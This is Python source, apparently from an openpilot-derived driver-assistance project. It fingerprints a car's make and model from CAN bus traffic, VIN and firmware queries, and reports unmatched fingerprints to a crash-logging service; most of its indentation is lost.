interface_names = _get_interface_names()
interfaces = load_interfaces(interface_names)
def only_toyota_left(candidate_cars):
return all(("TOYOTA" in c or "LEXUS" in c) for c in candidate_cars) and len(candidate_cars) > 0
# **** for use live only ****
def fingerprint(logcan, sendcan, has_relay):
params = Params()
car_selected = params.get('dp_car_selected', encoding='utf8')
car_detected = params.get('dp_car_detected', encoding='utf8')
cached_params = params.get("CarParamsCache")
if cached_params is None and car_selected == "" and car_detected != "":
params.put('dp_car_selected', car_detected)
params.put('dp_car_detected', "")
fixed_fingerprint = os.environ.get('FINGERPRINT', "")
if fixed_fingerprint == "" and cached_params is None and car_selected != "":
fixed_fingerprint = car_selected
skip_fw_query = os.environ.get('SKIP_FW_QUERY', False)
if has_relay and not fixed_fingerprint and not skip_fw_query:
# VIN query only works reliably through OBD-II
bus = 1
if cached_params is not None:
cached_params = car.CarParams.from_bytes(cached_params)
if cached_params.carName == "mock":
cached_params = None
if cached_params is not None and len(cached_params.carFw) > 0 and cached_params.carVin is not VIN_UNKNOWN:
cloudlog.warning("Using cached CarParams")
vin = cached_params.carVin
car_fw = list(cached_params.carFw)
else:
cloudlog.warning("Getting VIN & FW versions")
_, vin = get_vin(logcan, sendcan, bus)
car_fw = get_fw_versions(logcan, sendcan, bus)
fw_candidates = match_fw_to_car(car_fw)
else:
vin = VIN_UNKNOWN
fw_candidates, car_fw = set(), []
cloudlog.warning("VIN %s", vin)
Params().put("CarVin", vin)
finger = gen_empty_fingerprint()
candidate_cars = {i: all_known_cars() for i in [0, 1]} # attempt fingerprint on both bus 0 and 1
frame = 0
frame_fingerprint = 10 # 0.1s
car_fingerprint = None
done = False
while not done:
a = get_one_can(logcan)
for can in a.can:
# need to independently try to fingerprint both bus 0 and 1 to work
# for the combo black_panda and honda_bosch. Ignore extended messages
# and VIN query response.
# Include bus 2 for toyotas to disambiguate cars using camera messages
# (ideally should be done for all cars but we can't for Honda Bosch)
if can.src in range(0, 4):
finger[can.src][can.address] = len(can.dat)
for b in candidate_cars:
if (can.src == b or (only_toyota_left(candidate_cars[b]) and can.src == 2)) and \
can.address < 0x800 and can.address not in [0x7df, 0x7e0, 0x7e8]:
candidate_cars[b] = eliminate_incompatible_cars(can, candidate_cars[b])
# if we only have one car choice and the time since we got our first
# message has elapsed, exit
for b in candidate_cars:
# Toyota needs higher time to fingerprint, since DSU does not broadcast immediately
if only_toyota_left(candidate_cars[b]):
frame_fingerprint = 100 # 1s
if len(candidate_cars[b]) == 1 and frame > frame_fingerprint:
# fingerprint done
car_fingerprint = candidate_cars[b][0]
elif len(candidate_cars[b]) < 4: # For the RAV4 2019 and Corolla 2020 LE Fingerprint problem
if frame > 180:
if any(("TOYOTA COROLLA TSS2 2019" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA COROLLA TSS2 2019"
if any(("TOYOTA COROLLA HYBRID TSS2 2019" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA COROLLA HYBRID TSS2 2019"
if any(("TOYOTA PRIUS 2017" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA PRIUS 2017"
# bail if no cars left or we've been waiting for more than 2s
failed = all(len(cc) == 0 for cc in candidate_cars.values()) or frame > 200
succeeded = car_fingerprint is not None
done = failed or succeeded
frame += 1
source = car.CarParams.FingerprintSource.can
# If FW query returns exactly 1 candidate, use it
if len(fw_candidates) == 1:
car_fingerprint = list(fw_candidates)[0]
source = car.CarParams.FingerprintSource.fw
if fixed_fingerprint:
car_fingerprint = fixed_fingerprint
source = car.CarParams.FingerprintSource.fixed
cloudlog.warning("fingerprinted %s", car_fingerprint)
put_nonblocking('dp_car_detected', car_fingerprint)
return car_fingerprint, finger, vin, car_fw, source
def is_connected_to_internet(timeout=5):
try:
requests.get("https://sentry.io", timeout=timeout)
return True
except Exception:
return False
def crash_log(candidate):
while True:
if is_connected_to_internet():
crash.capture_warning("fingerprinted %s" % candidate)
break
def crash_log2(fingerprints, fw):
while True:
if is_connected_to_internet():
crash.capture_warning("car doesn't match any fingerprints: %s" % fingerprints)
crash.capture_warning("car doesn't match any fw: %s" % fw)
break
def get_car(logcan, sendcan, has_relay=False):
candidate, fingerprints, vin, car_fw, source = fingerprint(logcan, sendcan, has_relay)
if candidate is None:
cloudlog.warning("car doesn't match any fingerprints: %r", fingerprints)
candidate = "mock"
if not travis:
y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,))
y.start()
if not travis:
x = threading.Thread(target=crash_log, args=(candidate,))
x.start()
CarInterface, CarController, CarState = interfaces[candidate]
car_params = CarInterface.get_params(candidate, fingerprints, has_relay, car_fw)
car_params.carVin = vin
car_params.carFw = car_fw
car_params.fingerprintSource = source
return CarInterface(car_params, CarController, CarState), car_params
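# Usage sketch (added for illustration; not part of the original module). The
# 'can' and 'sendcan' socket names follow openpilot's messaging conventions,
# but treat this setup as an assumption rather than the real entry point,
# which is openpilot's controls daemon.
if __name__ == "__main__":
    logcan = messaging.sub_sock('can')
    sendcan = messaging.pub_sock('sendcan')
    car_interface, car_params = get_car(logcan, sendcan, has_relay=False)
    print("fingerprinted:", car_params.carFingerprint)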
|